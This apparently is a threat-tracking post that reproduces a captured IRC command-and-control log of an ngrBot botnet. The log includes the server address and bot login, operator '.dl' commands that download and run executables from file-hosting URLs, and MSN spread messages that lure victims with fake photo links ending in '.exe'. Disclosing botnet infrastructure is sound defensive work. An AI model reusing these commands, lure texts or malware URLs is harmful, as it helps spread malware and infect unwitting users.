Resolved : [gn.albacrew.com] To [108.166.82.173]
Remote Host Port Number
108.166.82.173 9731 PASS ngrBot
NICK n{US|XPa}ofiahmg
USER ofiahmg 0 0 :ofiahmg
JOIN #ng# ngrBot
PRIVMSG #ng# :[MSN]: Updated MSN spread interval to “4”
PRIVMSG #ng# :[MSN]: Updated MSN spread message to “look my Photos Like IT 🙂 http://facebook33media.com/IMG1234563315533.JPG.www.FaceBook.com.exe”
Topic By: [ a ]
(a) Kaspersky Anti-Virus 2012: message is blocked. Reason: phishing or suspicious URL
(a) .dl http://dl.dropbox.com/u/69321915/msn.exe -n
(Bb) .msn.int 4 .msn.set Hi these pictures is yours http://top-girlsfb.com/PHOTO1596324565.JPG.www.facebook.com.exe
(a) .dl http://dc540.4shared.com/download/Lpr06Dql/msn.exe?tsid=20120326-191800-3dd68f13 -n
(Bb) .msn.int 4 .msn.set Hi these pictures is yours http://top-girlsfb.com/PHOTO1596324565.JPG.www.facebook.com.exe
(a) .dl .dl http://dl.dropbox.com/u/69321915/tbt.exe -n
(a) .dl http://dl.dropbox.com/u/69321915/tbt.exe -n
(Bb) .msn.int 4 .msn.set Hi these pictures is yours http://top-girlsfb.com/PHOTO1596324565.JPG.www.facebook.com.exe
(Bb) .msn.int 4 .msn.set Hi these pictures is yours http://top-girlsfb.com/PHOTO1596324565.JPG.www.facebook.com.exe
(Bb) .msn.int 4 .msn.set Hi these pictures is yours http://top-girlsfb.com/PHOTO1596324565.JPG.www.facebook.com.exe
(a).dl http://dl.dropbox.com/u/69321915/tbt.exe -n
(a).dl http://dl.dropbox.com/u/69321915/msn.exe -n
exe files from these links can conect to diferent servers or domains so check them all
hosting infos:
http://whois.domaintools.com/108.166.82.173